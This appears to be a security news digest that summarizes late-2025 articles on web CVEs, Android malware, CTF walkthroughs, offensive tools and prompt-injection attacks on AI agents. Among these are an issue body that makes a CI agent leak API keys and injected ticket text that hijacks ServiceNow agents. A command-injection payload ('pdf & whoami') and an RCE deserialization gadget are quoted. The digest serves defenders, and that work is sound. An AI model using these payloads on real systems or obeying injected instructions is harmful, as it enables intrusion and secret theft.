Methodology guide for researching and reversing web CVEs. It shows how to reconstruct vulnerable environments, attach language-specific debuggers (Java JDWP/IntelliJ, .NET decompilers, Node.js, PHP/Xdebug), and perform patch diffing with jadx + Git. The blog explains how to prioritize high-impact CVEs, derive minimal safe triggers, and encode them into hardened Nuclei templates. It also prescribes a structured folder layout and note-taking process so patch-to-primitive reasoning remains reproducible and useful for future exploit chains.

🌐 Web | 💉 XSS | 💰 Bug Bounty

🔗 Original article: https://medium.com/@ZombieHack/apple-developer-stored-xss-5-000-bounty-writeup-2025-cc34a030a5bf

The post details a high‑impact stored XSS in Apple’s shared forum backend, first found on discussions.apple.com and then, via a sanitization bypass, on developer.apple.com/forums and multiple regional mirrors. User-controlled forum content was insufficiently sanitized before being stored and rendered, enabling arbitrary JavaScript execution in authenticated Apple sessions. The researcher reported the bug, found a bypass after Apple’s initial fix, and Apple later deployed a system-wide patch, publicly acknowledged the issue, and awarded a $5,000 bounty.

📡 IoT | 🛡️ CVE | 💣 RCE | 🎁 PoC

🔗 Original article: https://www.synacktiv.com/en/publications/breaking-the-beestation-inside-our-pwn2own-2025-exploit-journey.html

The blog details CVE-2025-12686: a pre-auth stack-based buffer overflow in Synology BeeStation Plus’s default bee-AdminCenter API (SYNO.BEE.AdminCenter.Auth). A Base64-decoded JSON parameter, auth_info, overflows a 4096-byte stack buffer because its decoded size is taken from attacker-controlled length. Using the fork-per-request model and stable canary, the authors bruteforce the canary, a stack pointer, and a code pointer via HTTP 200/502 oracles, then craft a ROP chain with a write-what-where gadget and SLIBCExecl to spawn a root bind shell. Synology’s BSM 1.3.2-65648 patch adds strict length checks and caps decoded_len to 4096.

📱 Android | 🔐 TLS | 🧪 Pentest | 🛠️ Tool

🔗 Original article: https://hardsoftsecurity.es/index.php/2025/11/26/ssl-pinning-bypass-android/

The post explains how Android SSL/TLS pinning works and provides a full, command-level guide to bypassing it on a rooted emulator. Using ADB, Burp’s CA is installed into /system/etc/security/cacerts. Then Frida is deployed (frida-server on the device, frida-tools on the host) and a Flutter-specific Codeshare script (TheDauntless/disable-flutter-tls-v1) is injected to disable TLS verification. With the emulator proxy set to Burp, all HTTPS traffic from the pinned app becomes fully interceptable and modifiable for comprehensive API security testing.

📱 Mobile | 🌐 Web | 🛠️ Tool | 💰 Bug Bounty

🔗 Original article: https://www.yeswehack.com/learn-bug-bounty/android-recon-bug-bounty-guide

Comprehensive Android recon workflow for bug bounty: obtain authentic APKs (Play + APKeep/OAuth, device/ADB, split APKs), verify signatures, then decompile with APKTool and jadx-gui. The guide shows how to mine resources and Java code for hidden endpoints, hardcoded secrets, client-side auth/role checks, weak token validation, insecure storage, intent/path-traversal issues, and dangerous WebView + JavaScript interfaces, producing a prioritised attack list for later dynamic exploitation.

📱 Android | 💣 RAT | 💰 Banking | ⛓️ MaaS

🔗 Original article: https://www.cleafy.com/cleafy-labs/albiriox-rat-mobile-malware-targeting-global-finance-and-crypto-wallets

Albiriox is a MaaS Android banking RAT with a two‑stage JSONPacker‑protected dropper (“PENNY”) that tricks users via fake Google Play and system‑update overlays into granting “Install Unknown Apps,” then sideloads the payload (e.g., com.nmz.nmz). It uses unencrypted TCP + JSON C2, Accessibility‑based AC VNC to bypass FLAG_SECURE, and rich UI/lockscreen commands plus black/update overlays for stealth On‑Device Fraud against >400 hardcoded banking/crypto apps. A custom builder integrated with Golden Crypt continuously re‑crypts APKs to evade static detection.

🛡️ CVE | 🌐 Web | 💣 RCE | 🛠️ Tool

🔗 Original article: https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-11-28-2025

Metasploit 6.4.100 ships 10 new modules: SMB→MSSQL NTLM relay, FortiWeb unauth RCE via CVE-20205-64446/CVE-2025-58034, three IGEL OS SUID-based post/privesc/persistence modules, two Flowise RCE modules (Custom MCP and JS injection via CVE‑2025‑59528/CVE‑2025‑8943), Notepad++ plugin persistence, and RISC‑V chmod payloads. Three framework bugs are fixed in HTTP login scanners, extension preloading, and Nexpose scans.

🛠️ Tool | 📱 Mobile

🔗 Original article: https://github.com/majd/ipatool

IPATool is an MIT-licensed Go CLI that authenticates to the iOS App Store with an Apple ID to search apps, purchase licenses, list all available versions, and download encrypted IPA packages. It exposes subcommands like auth, search, purchase, list-versions, download, and get-version-metadata, with automation-friendly flags (--format json, --non-interactive, --keychain-passphrase, --verbose). It is mainly a helper tool for reverse engineering and large-scale analysis of iOS apps, not an exploit or vulnerability PoC.

🌐 Web | 🛡️ IDOR | 💣 RCE | 💰 Bug Bounty

🔗 Original article: https://0xdf.gitlab.io/2025/11/29/htb-era.html

The post compromises HTB’s Era by chaining: (1) an IDOR in file downloads to grab a site backup and signing keys; (2) insecure security-question reset to hijack the admin account; (3) PHP stream-wrapper abuse in an admin-only download feature with ssh2.exec to obtain a reverse shell as eric; and (4) a Linux privesc where a root cron “verifies” and executes a group-writable ELF using a weak .text_sig + grep check. By embedding a forged Era Inc. certificate into a malicious monitor binary, the attacker gains root.

Web | RCE | XSS | Bug Bounty

🔗 Original article: https://herish.me/blog/cache-poisoning-case-studies-part-1-foundational-attacks/

The post systematically explains foundational web cache poisoning attacks across HackerOne, GitHub, Shopify, GitLab, Cloudflare, Red Hat, and a private program. It shows how unkeyed or mis-handled headers (X-Forwarded-Host, X-Forwarded-Scheme, Content-Type, X-HTTP-Method-Override, Host casing) and method-unaware or shared caches turn simple misconfigurations into global redirects, stored XSS, and large-scale DoS. Concrete HTTP examples, a Python poisoning loop, and method-override tricks are given, alongside layered defensive advice at app, CDN, and architecture levels.

🌐 Web | 🛡️ CVE | 💣 RCE

🔗 Original article: https://research.checkpoint.com/2025/openai-codex-cli-command-injection-vulnerability/

CVE-2025-61260 is a command-execution flaw in OpenAI Codex CLI. A repository can ship a .env with CODEX_HOME=./.codex and a ./.codex/config.toml defining mcp_servers commands. When a developer runs codex in that repo, Codex loads this local config and automatically executes the attacker-defined MCP command/args with no prompts, enabling persistent RCE and supply-chain compromise. Codex CLI 0.23.0 fixes this by blocking .env-driven redirection of CODEX_HOME into project directories.

🌐 Web | 🛠️ Tool | 📡 IoT

🔗 Original article: https://www.mobile-hacker.com/2025/12/01/plug-play-pwn-hacking-with-evil-crow-cable-wind/

The post details Evil Crow Cable Wind, an ESP32‑S3–based open‑source BadUSB cable that emulates a keyboard, supports Wi‑Fi control via a built‑in web UI, and stores OS‑tagged payloads with AutoExec on plug‑in. Firmware is updated over HTTP using a <code>curl -F "file=@firmware.ino.bin" cable-wind.local/update</code> flow. A Remote Shell is built by HID‑bootstrapping a serial command loop on the victim, then bridging it over Wi‑Fi TCP to an attacker client, allowing offline local RCE. The article compares it with USB Ninja and O.MG Cable and notes compatibility with USB Army Knife firmware.

⛓️ Web3 | 💣 RCE | 🛡️ CVE | 💰 Bug Bounty

🔗 Original article: https://research.checkpoint.com/2025/16-wei/

The post analyzes a $9M exploit in Yearn’s yETH pool where cached virtual balances (packed_vbs[]) were not reset when LP supply hit zero. An attacker used flash loans and repeated deposit–withdraw cycles to accumulate phantom virtual balances, then burned all LP tokens and made a 16‑wei “first deposit.” The pool read stale cached values, minting ~235 septillion yETH LP tokens, which were redeemed to drain the LSD basket. The article details the AMM design, root cause, and defenses such as explicit cache resets and sanity checks on minting ratios.

🛠️ Tool | 🌐 Web | 💣 RCE | 💉 XSS

🔗 Original article: https://blog.doyensec.com/2025/12/02/inql-v610.html

InQL v6.1.0 is a major offensive-focused update to the GraphQL Burp extension. It adds a schema brute-forcer that reconstructs schemas via error and hint analysis, a GraphQL engine fingerprinter based on error signatures, and automatic variable generation for valid Repeater/Intruder payloads. Additional search, POI, caching, and performance improvements streamline large-schema testing. Open-sourcing encourages contributions to extend request formats, exports, and tracking of GraphQL operations, strengthening end-to-end discovery and exploitation workflows against GraphQL APIs.

📱 Mobile | 🌐 Web | 🛡️ CVE | 🎁 PoC

🔗 Original article: https://xcheater.medium.com/all-about-android-pentesting-f047b7c7e0f1

The blog outlines a complete Android pentesting methodology on rooted devices. It covers static analysis (manifest review, dangerous permissions, backup/debug flags, network config, exported components, Firebase security, hardcoded secrets, insecure storage), code review with Semgrep and MobSF, and APK signature/anti-tampering checks including Janus (CVE-2017-13156). It then details how root detection and SSL pinning are implemented and shows multiple bypass techniques using Magisk, Frida, Objection, HTTP Toolkit, APKToolGUI, and patching, enabling full dynamic analysis and exploitation of Android apps.

🌐 Web | 🛡️ CVE | 💣 RCE

🔗 Original article: https://www.tenable.com/blog/react2shell-cve-2025-55182-react-server-components-rce

The blog explains CVE-2025-55182 (React2Shell), a CVSS 10 unsafe-deserialization bug in React Server Components. Any app that supports RSC, including many Next.js App Router apps, may be exploitable: an attacker can send crafted serialized RSC payloads to RSC/Server Function endpoints and achieve unauthenticated RCE. Affected libraries are react-server-dom-{parcel,turbopack,webpack} 19.0–19.2.0. Fixed versions are 19.0.1, 19.1.2, 19.2.1 and specific Next.js 15.x/16.x patch releases. No public default-config PoC is known yet; urgent upgrading and scanning with Tenable plugins is advised.

🌐 Web | 💣 RCE | 🛡️ CVE | 🎁 PoC

🔗 Original article: https://github.com/ghe770mvp/RSC_Vuln_Lab

Deliberately vulnerable React Server Components lab for CVE-2025-55182 in react-server-dom-webpack 19.2.0. A Node.js server uses RSDW’s decodeAction to deserialize multipart React Server Action payloads and invoke app/server-actions#generateReport. This action builds a shell command with child_process.exec using unsanitized string concatenation. A crafted multipart POST to /formaction with JSON {"id":"app/server-actions#generateReport","bound":["acme","pdf & whoami"]} injects shell metacharacters, yielding RCE via whoami output in the JSON response. Mitigation: upgrade to 19.2.1+ and remove unsafe exec usage.

Make real life

Web | XSS | RCE | CVE

🔗 Original article: https://bishopfox.com/blog/arista-nextgen-firewall-xss-to-rce-chain

The blog presents a full chain on Arista NG Firewall from stored XSS in the admin UI to root RCE. A low-privileged user injects persistent JavaScript into a config field, which steals an admin’s non-HttpOnly session cookie. With the hijacked cookie, the attacker reaches an admin-only endpoint where a Java helper builds shell commands via string concatenation and executes them with /bin/sh -c, enabling command injection (e.g., nc reverse shell) as root. It details payloads, HTTP requests, verification commands, impact, and recommended mitigations.

🌐 Web | 🛡️ CVE | 💣 RCE

🔗 Original article: https://unit42.paloaltonetworks.com/cve-2025-55182-react-and-cve-2025-66478-next/

The blog analyzes CVE-2025-55182 (React) and its duplicate CVE-2025-66478 (Next.js), a critical CVSS 10.0 insecure deserialization flaw in React Server Components’ Flight protocol. Crafted HTTP Flight payloads sent to RSC endpoints let unauthenticated attackers obtain deterministic RCE on default React 19 / Next.js App Router deployments and other frameworks bundling vulnerable react-server-dom packages. The post lists exact affected and patched versions, stresses immediate upgrades, and provides detailed Cortex XDR/XSIAM XQL queries for hunting post-exploitation file activity, recon tooling, and Node → shell → downloader chains.

🌐 Web | 🤖 AI | 💣 RCE | 🎁 PoC

🔗 Original article: https://www.aikido.dev/blog/promptpwnd-github-actions-ai-agents

The post introduces PromptPwnd, a verified AI prompt-injection pattern in GitHub/GitLab CI where LLM agents receive untrusted issue/PR/commit content and can invoke powerful tools with high-privilege tokens. Aikido demonstrates this via Google’s Gemini CLI: a crafted issue body instructs the agent to run gh issue edit and dump $GEMINI_API_KEY and $GITHUB_TOKEN into the issue body. Similar misconfigurations in Claude Code, OpenAI Codex, and GitHub AI Inference enable secret leakage or repository manipulation. The article provides open detection rules (OpenGrep) and detailed hardening guidance.

🌐 Web | 💉 XSS | 🛡️ Clickjacking | 💣 UX Deception

🔗 Original article: https://lyra.horse/blog/2025/12/svg-clickjacking/

The post introduces “SVG clickjacking”: applying complex SVG filters to cross-origin iframes to manipulate their pixels and build a pixel-based logic engine inside the browser’s renderer. Using primitives like feTile, feComposite, feBlend, feMorphology, and feColorMatrix, the attacker can hide grey hints, re-style victim inputs, read specific pixels as booleans, implement logic gates and a full adder, and drive multi-step overlays synchronized with the real UI. This enables realistic, stateful clickjacking and graphical data exfiltration without breaking SOP, mitigated mainly by frame-ancestors / X-Frame-Options.

🛠️ Tool | 💣 RCE | 🛡️ CVE | 🌐 Web

🔗 Original article: https://github.com/Spritualkb/CVE-2025-55182-exp

Python exploit framework for CVE-2025-55182, a critical RCE in React Server Components / Next.js App Router with Server Actions (react-server-dom-webpack 19.0.0–19.2.0). It abuses Flight protocol deserialization to pollute Object.prototype.then, pivot _response._formData.get to the Function constructor via "$1:constructor:constructor", and execute attacker JavaScript from _response._prefix. The tool supports single/batch checks, blind command execution, reverse shells, and output exfiltration, with proxy, stealth profiles, and delay controls, plus mitigation guidance.

📱 Android | ⛓️ Web3 | 🛡️ Malware | 💰 Crypto

🔗 Original article: https://www.cyfirma.com/research/seedsnatcher-dissecting-an-android-malware-targeting-multiple-crypto-wallet-mnemonic-phrases/

SeedSnatcher is a mature Android crypto-stealing malware (Coin.apk / com.pureabuladon.auxes) that abuses SMS, overlay, and usage-access permissions plus dynamic DEX loading and WebSocket C2. It monitors wallet app launches, draws fake import screens for Trust, MetaMask, Binance, OKX, etc., validates entered seed words against the BIP39 list, and exfiltrates valid mnemonics. It also intercepts SMS (OTP/2FA), controls calls/USSD, and steals contacts, call logs, screenshots, and files, using integer-coded commands (2000–2400) to evade protocol analysis.

📱 Android | 🕵️ Spyware | 💣 RCE | 🎁 PoC

🔗 Original article: https://zimperium.com/blog/return-of-clayrat-expanded-features-and-techniques

Analysis of ClayRat Android spyware v3.0.8: AES/CBC-packed payload in assets, heavy abuse of Default SMS and Accessibility Services to steal lock-screen PIN/password/pattern and auto-unlock, MediaProjection-based screen recording with WebSocket remote desktop, fake/harvested notifications, overlay-based PIN phishing, rich JSON/WebSocket C2 (UI control, SMS/calls, keylogging, camera, discovery), and MITRE ATT&CK mapping. A GitHub IOC repo enables practical detection.

🌐 Web | 💣 RCE | 🛡️ CVE | 🎁 PoC

🔗 Original article: https://www.offsec.com/blog/cve-2025-55182/

CVE-2025-55182 is a CVSS 10.0 unauthenticated RCE in React Server Components (versions 19.0–19.2.0). RSC’s Flight parser unsafely deserializes client-controlled “Chunks” as Promises, allowing crafted thenables to access and modify internal _response state. By abusing gadgets like _response._prefix and _response._formData.get = "$1:constructor:constructor", an attacker reaches Function and executes arbitrary Node.js code. A multipart PoC POST creates /tmp/rce_poc via child_process.execSync, proving RCE. Any app (even indirectly) using vulnerable react-server-dom-* must patch and investigate exposed RSC endpoints.

📱 Android | 💳 Banking | 💣 RCE | 🛡️ Malware

🔗 Original article: https://www.intel471.com/blog/new-fvncbot-android-banking-trojan-targets-poland

FvncBot is a new Android banking trojan delivered via a fake mBank “Security key” app targeting Polish users. A loader abuses Android’s session-based package installer to drop an obfuscated payload that, once granted Accessibility Service privileges, implements accessibility-based keylogging, web-inject overlays via WebView+JS bridge, screen streaming, and HVNC-style remote control over a WebSocket/FRP tunnel. C2 uses plaintext HTTP JSON (e.g., /api/v1/devices/register) plus FCM commands like enable_ws, enabling real-time credential theft and in-app banking fraud from the victim’s own device.

🛡️ CVE | 🌐 Web | 💣 RCE | 🛠️ Tool

🔗 Original article: https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-12-05-2025

Metasploit 6.4.101 adds modules for Twonky Server log-based credential decryption (CVE-2025-13315/13316), Monsta FTP downloadFile arbitrary file write to RCE (CVE-2025-34299), and a WordPress AI Engine MCP unauthenticated admin-creation to RCE chain (CVE-2025-11749). It introduces Linux RISC-V 32/64-bit reverse TCP shell payloads, improves AD CS LDAP ESC detection and connectivity, adds TLS-encrypted MSSQL session support via MsTds::Channel, and removes CAIN hash output. Updates are available via msfupdate, GitHub, nightly installers, or Metasploit Pro.

🌐 Web | 💣 RCE | 💉 XSS | 🛡️ Misconfig

🔗 Original article: https://appomni.com/ao-labs/ai-agent-to-agent-discovery-prompt-injection/

The post explains a second‑order prompt injection technique against ServiceNow Now Assist’s agent discovery. A low‑privileged user stores malicious text in a ticket. When an admin runs a Now Assist agent that reads this field, the AiA ReAct Engine and Orchestrator recruit more powerful discoverable agents (CRUD, role, email tools) in the same team to obey the injected instructions under admin privileges. This enables cross‑ticket data exfiltration, privilege escalation, and email exfiltration despite prompt protections. Mitigations: supervised execution, keep sn_aia.enable_usecase_tool_execution_mode_override false, segment agents by team, and monitor with AppOmni AgentGuard.

🌐 Web | 🧠 AI | 💉 Prompt Injection | 💾 Agentic Tools

🔗 Original article: https://unit42.paloaltonetworks.com/model-context-protocol-attack-vectors/

The post analyzes MCP’s sampling feature and shows how untrusted MCP servers can attack LLM-based copilots. By forking Anthropic’s demo “everything” MCP server and adding a malicious code_summarizer tool, the authors demonstrate three prompt-injection PoCs: hidden token-heavy completions for resource theft, persistent behavior changes via injected meta-instructions in conversation history, and covert filesystem writes via injected writeFile tool calls. They detail the JSON sampling/createMessage API, attack flows, and propose defenses: strict prompt templates, token limits, request/response scanning, tool-approval gating, context isolation, and rate limiting.

🌐 Web | 🛡️ CVE | 💣 RCE | 🛠️ Tool

🔗 Original article: https://portswigger.net/blog/how-to-detect-react2shell-with-burp-suite

The post explains how to detect the critical React2Shell RCE vulnerabilities (CVE-2025-55182, CVE-2025-66478) in Next.js apps using Burp Suite. It details using ActiveScan++ v2.0.8 in Burp Suite Professional and DAST for automated checks and how to import a dedicated React2Shell Bambda custom scan check for targeted endpoint testing. It stresses that simply detecting React server components is not enough to prove exploitability and that these CVSS 10.0 issues should be treated as high-priority risks.

🌐 Web | 💣 RCE | 🛡️ CVE | 🎁 PoC

🔗 Original article: https://0xdf.gitlab.io/2025/12/06/htb-editor.html

The post exploits HTB Editor by chaining an unauthenticated Groovy RCE in XWiki SolrSearch (CVE-2025-24893), password reuse, and a Netdata ndsudo PATH injection (CVE-2024-32019). The attacker injects Groovy via the Solr RSS endpoint, uses String.execute() to run OS commands, and downloads a bash reverse shell to gain a shell as xwiki. XWiki’s Hibernate config reveals MySQL creds, reused for SSH as oliver. Locally, a SUID-root ndsudo that trusts PATH is abused with a malicious nvme binary to create a SUID-root bash and obtain root.

🛠️ Tool | 💣 RCE | 🛡️ CVE | 🌐 Web

🔗 Original article: https://github.com/P0142/LDAP-Bof-Collection

LDAP BOF Collection is a Beacon Object File toolkit for on‑host LDAP/LDAPS interaction with Active Directory, designed for Adaptix C2 but usable in any x64 BOF‑capable C2. It provides 40+ commands for enumeration, object creation, modification, deletion, and attack macros that automate GenericAll/GenericWrite, DCSync, AS‑REP roasting, Kerberoasting, and delegation/RBCD abuse. Operators build with MinGW‑w64, load ldap.axs into Adaptix, and then use ldap subcommands to perform AD recon, privilege escalation, and persistence entirely in memory.

🛠️ Tool | 💣 RCE | 🌐 Web | 💰 Bug Bounty

🔗 Original article: https://sensepost.com/blog/2025/pipetap-a-windows-named-pipe-proxy-tool/

pipetap is a Windows named pipe proxy tool. It injects a support DLL into target processes, hooks named pipe APIs using Microsoft Detours, and exposes events to an ImGUI-based GUI that can intercept, modify, and replay pipe traffic. It adds a pipelist enumerator (with ACLs), a built‑in pipe client and message composer, a remote-client mode to impersonate other PIDs and bypass PID-based validation, and a TCP-to-pipe proxy with a Python SDK for automation and fuzzing. It’s non-stealthy and has partial async support but is powerful for analyzing and exploiting named-pipe IPC.

🛡️ CVE | 💣 RCE | 🖥️ Windows | 🎁 PoC

🔗 Original article: https://sensepost.com/blog/2025/pwning-asus-driverhub-msi-center-acer-control-centre-and-razer-synapse-4/

The post reverse‑engineers ASUS DriverHub, MSI Center, Acer Control Centre, and Razer Synapse 4 to uncover multiple high‑impact bugs. ASUS exposes a localhost HTTP API trusted by any Origin/URL containing .asus.com and performs only superficial PE signature checks, enabling 1‑click browser‑driven RCE with certificate cloning. MSI Center’s SYSTEM TCP service has a TOCTOU bug in a signed‑binary updater and a plugin command that runs arbitrary executables as SYSTEM without signing. Acer Control Centre exposes a remotely accessible named pipe; a magic 113/114 argument controls token impersonation, allowing remote SYSTEM RCE. Razer’s elevation service also permits local privilege escalation.

🛠️ Tool | 🌐 Web | 📡 IoT

🔗 Original article: https://github.com/Cfomodz/whatsmap

whatsmap is a Go fork of whatsmeow that exposes WhatsApp’s multi-device protocol via a client library and a CLI (wamapper). It implements WebSocket/TLS communication, protobuf-based message construction, app-state sync, broadcast sending, and media download/decryption, then maps events into JSON-like types for external integrations. No CVEs are documented, but deployment is sensitive: access to its API or store effectively grants full control over the bound WhatsApp account and its decrypted media.

🌐 Web | 📡 Side-Channel | 🛡️ Privacy | 💣 DoS

🔗 Original article: https://arxiv.org/html/2411.11194v4

The paper shows that WhatsApp and Signal delivery receipts, especially for reactions, edits, and deletes, can be abused as a high‑rate timing side channel. Using API‑level tools (whatsmeow, Cobalt, signal‑cli), attackers can send self‑reactions, reaction removals, and even reactions to non‑existent messages that silently trigger delivery receipts. From RTT patterns and multi‑device per‑device acks, they fingerprint devices, infer screen/app activity, track routines, and mount battery/data‑drain DoS—all with only a phone number and no visible notifications. Threema’s stricter design largely prevents such covert probing.

🛡️ CVE | 🌐 Web | ⛓️ Web3 | 💣 RCE

🔗 Original article: https://research.checkpoint.com/2025/8th-december-threat-intelligence-report/

The 8th December Check Point Threat Intelligence Report covers multiple real‑world breaches, the critical React2Shell RCE (CVE‑2025‑55182) in React/Next.js, an OpenAI Codex CLI project‑local config RCE, and a Yearn Finance yETH smart‑contract minting flaw. It also summarizes large telecom espionage (Salt Typhoon), BRICKSTORM vSphere backdoors, ShadyPanda’s malicious browser extensions, the SharePoint “ToolShell” + Velociraptor + Warlock ransomware chain, and the Albiriox Android banking trojan using accessibility abuse, overlays, VNC‑style control, and JSON‑over‑TCP C2.

Hello

🛠️ Tool | 🖥️ Windows | 🌐 Web | 💣 RCE

🔗 Original article: https://github.com/sensepost/pipetap

pipetap is a Windows Named Pipe multi-tool that injects a support DLL into target processes to hook Named Pipe APIs and stream traffic to a GUI. It lets you capture, decode (hex/UTF-8/UTF-16), intercept, edit, and replay Named Pipe messages, and includes a remote proxy mode that opens pipes from inside the target process, bypassing ACL restrictions. Python/shared components and test clients/servers round out a full stack for researching and exploiting Named-Pipe–based protocols.

🌐 Web | 🛡️ CVE | 💣 RCE

🔗 Original article: https://jfrog.com/blog/2025-55182-and-2025-66478-react2shell-all-you-need-to-know/

The post explains React2Shell (CVE-2025-55182 in React and CVE-2025-66478 in Next.js), a critical RCE in React Server Components/Functions exploitable via crafted HTTP requests to RSF endpoints. It details which React RSC packages and Next.js versions are vulnerable, default exposure in Next.js App Router apps, and provides exact fixed versions. Definitive mitigation is upgrading, with a possible temporary Next.js workaround (migrating back to Pages Router). Detection options include JFrog Xray IDs XRAY-900398/900476 and the open-source react2shell-scanner that looks for 500 responses containing E{"digest".

🛠️ Tool | 🌐 Web | 💣 RCE | 🎁 PoC

🔗 Original article: https://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension

Burp Suite Java extension that actively detects Next.js React Server Components RCE vulnerabilities (CVE-2025-55182, CVE-2025-66478). It sends a crafted malformed multipart RSC payload to trigger a colon-delimited property access bug in RSC parsers, then looks for a 500 status plus the RSC error fragment E{"digest". Positive matches are reported as high‑severity RCE issues. The project ships as NextJsRceScanner-1.0-SNAPSHOT.jar, can be built via Gradle (JDK 21+), integrates with Burp’s Active Scanner and context menu, and includes a video PoC.

🛠️ Tool | 🌐 Web

🔗 Original article: https://blog.bughunt.com.br/um-guia-para-utilizar-nuclei-na-busca-por-vulnerabilidades/

The post introduces the Nuclei open‑source vulnerability scanner, focusing on its YAML template architecture, multi‑protocol support (HTTP, DNS, TCP, SSL), and how templates define requests and response‑matching rules. It explains the workflow (preparation, template updates, template selection, scan execution, and result interpretation), stresses careful scoping and template choice, and recommends creating custom templates for internal or business‑logic checks. Nuclei is presented as an automation and standardization layer that complements, but does not replace, manual testing and broader security processes.

🌐 Web | 🛡️ CVE | 💉 XSS

🔗 Original article: https://www.rapid7.com/blog/post/cve-2025-10573-ivanti-epm-unauthenticated-stored-cross-site-scripting-fixed

CVE-2025-10573 is a CVSS 9.6 unauthenticated stored XSS in Ivanti EPM (< EPM 2024 SU4 SR1) via the /incomingdata/postcgi.exe API. Attackers send crafted key=value scan data with injected quotes and <script> tags in fields like Device Name and OS - Name. This data is stored and later rendered without output encoding in admin pages such as frameset.aspx and db_frameset.aspx, executing attacker JavaScript in the admin’s session. This enables full EPM and endpoint compromise. Fixed in EPM 2024 SU4 SR1.

🌐 Web | 💣 RCE | 🛡️ Spyware | 🎁 PoC

🔗 Original article: https://securitylab.amnesty.org/latest/2025/12/intellexa-leaks-predator-spyware-operations-exposed/

The post analyzes leaked Intellexa documents and videos to dissect Predator spyware: its multi‑layer C2, encrypted storage (fs.db, RSA_PKEY, FS_KEY), and delivery vectors (1‑click browser exploits, Triton baseband via 2G, Mars/Jupiter ISP injection, and Aladdin ad‑based zero‑click). It exposes internal OPSEC design, detailed IOCs (paths, process names, domains) and shows Intellexa using TeamViewer to access live customer systems and Predator dashboards. Forensics link operations in Egypt, Greece and Kazakhstan and confirm Predator remains actively deployed, including recent targeting in Pakistan.

🌐 Web | 💣 RCE | 🛡️ CVE | 🛠️ Tool

🔗 Original article: https://trustedsec.com/blog/holy-shuck-weaponizing-ntlm-hashes-as-a-wordlist

The article explains how to use existing NTLM hashes as a Hashcat wordlist (NT-candidate modes) to validate password reuse across NT-derived formats like Kerberos RC4 TGS/AS-REP, NetNTLMv1/v2, and DCC/DCC2 without cracking plaintext. It details key Hashcat modes (27000, 27100, 31500, 31600, 35300, 35400), shows how to build NT corpora from DCSync and LSA dumps (secretsdump.py, NetExec, Mimikatz), and demonstrates cross-domain lateral movement by shucking Kerberoast and DCC2 hashes, then abusing the recovered NT hashes with pass-the-hash.

🛡️ CVE | 💣 RCE | 📱 Mobile | 🧠 Threat Intel

🔗 Original article: https://cloud.google.com/blog/topics/threat-intelligence/intellexa-zero-day-exploits-continue

The blog details Intellexa’s extensive use of mobile zero-days, including 15 CVEs across iOS, Android, Chrome, Skia, and Mali, and explains a captured iOS chain (“smack”) built on WebKit JIT RCE (CVE-2023-41993), kernel IPC UAF (CVE-2023-41992), and an iOS code-signing bypass (CVE-2023-41991) via the JSKit exploitation framework. It describes the PREYHUNTER iOS stager (helper/watcher modules), Intellexa’s generic Chrome/V8 framework that abuses TheHole leaks, ad-based exploit delivery, and provides file hashes plus a PREYHUNTER YARA rule for detection.

💣 Ransomware | 🧪 Malware | 🌐 Web | 🛠️ Tool

🔗 Original article: https://unit42.paloaltonetworks.com/new-ransomware-01flip-written-in-rust/

The blog dissects 01flip, a Rust-based multi-platform ransomware used in targeted APAC attacks. Initial access likely abuses CVE-2019-11580 on Atlassian Crowd, followed by Sliver C2 (Linux TCP Pivot beacons) for recon and lateral movement before deploying 01flip across Windows and Linux. 01flip enumerates drives, drops RECOVER-YOUR-FILE.TXT, encrypts files with AES-128-CBC and an embedded RSA-2048 public key, renames them to <ORIGINAL>.<UNIQUE_ID>.[0/1].01flip, and wipes itself via fsutil/dd + rm. Strings are obfuscated via a custom 2-byte subtraction cipher, and a large extension exclusion list includes “lockbit.”

🌐 Web | 💣 RCE | 🛡️ Supply Chain | 🛠️ Tool

🔗 Original article: https://redcanary.com/blog/threat-detection/shai-hulud-worm/

The post dissects the Shai-Hulud 2.0 npm worm, which uses malicious preinstall scripts (e.g., setup_bun.js, bun_environment.js) to deploy the Bun runtime, run TruffleHog for large-scale secret theft, and exfiltrate credentials to attacker-created public GitHub repos. It further propagates by backdooring GitHub Actions workflows and abusing self-hosted runners, with a destructive failsafe that may wipe $HOME/%USERPROFILE% if exfiltration fails. The article details concrete detection patterns (Bun→TruffleHog, suspicious workflows, rogue runners) and prescribes secret rotation, token hardening, and supply-chain controls.

📱 Mobile | 🌐 Web | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://hackmd.io/@sal/fuzzme-mobilehackinglab-ctf-writeup

The blog details how to reverse engineer and fuzz an Android AArch64 shared library (libvalidate.so) that validates a structured JSON and crashes when a secret flag is correct. It shows reconstructing the JSON schema, deducing a value*2==84 arithmetic check, leaking the flag via an LD_PRELOAD-based snprintf hook, and then building an AFL harness that embeds 9 fuzzed bytes into the flag suffix. AFL crashes pinpoint the correct suffix, illustrating practical binary harnessing, hooking, and fuzzing techniques.

💣 RCE | 🛡️ CVE | 🌐 Web | 🎁 PoC

🔗 Original article: https://research.checkpoint.com/2025/cracking-valleyrat-from-builder-secrets-to-kernel-rootkits/

The blog dissects ValleyRAT/Winos4.0, reconstructing its leaked builder, 19 main plugins, and a 64‑bit kernel rootkit. It details how Driver Plugin.dll installs a signed driver as service kernelquick, configures registry‑based hide/protect lists, supports MalSeclogon‑based stealth installation, and exposes IOCTLs for APC shellcode injection, kernel‑level file hiding, and forced deletion of AV/EDR drivers. The driver is a refactored fork of the Hidden rootkit, extended with UMInjection, ForceDeleteFile, and SYSTEM_START persistence, and remains loadable on fully updated Windows 11 unless blocklisted.

🌐 Web | 💣 RCE | 🛡️ CVE

🔗 Original article: https://thehackernews.com/2025/12/net-soapwn-flaw-opens-door-for-file.html

SOAPwn is a .NET Framework exploitation primitive where SOAP HTTP client proxies and WSDL-generated proxies accept non-HTTP URLs like file:// or UNC paths. When an app lets attackers control WSDLs or proxy endpoints, .NET routes SOAP traffic through file handlers, turning requests into arbitrary file writes or SMB writes. This enables web shell uploads for RCE and NTLM credential capture/relay. Multiple products, including Barracuda Service Center RMM (CVE-2025-34392) and Ivanti EPM (CVE-2025-13659), were affected; Umbraco 8 remains vulnerable due to EoL.

🌐 Web | 🛡️ AI Security | 💣 Business Logic | 💰 Fraud

🔗 Original article: https://www.tenable.com/blog/microsoft-copilot-studio-security-risk-how-simple-prompt-injection-leaked-sensitive-data

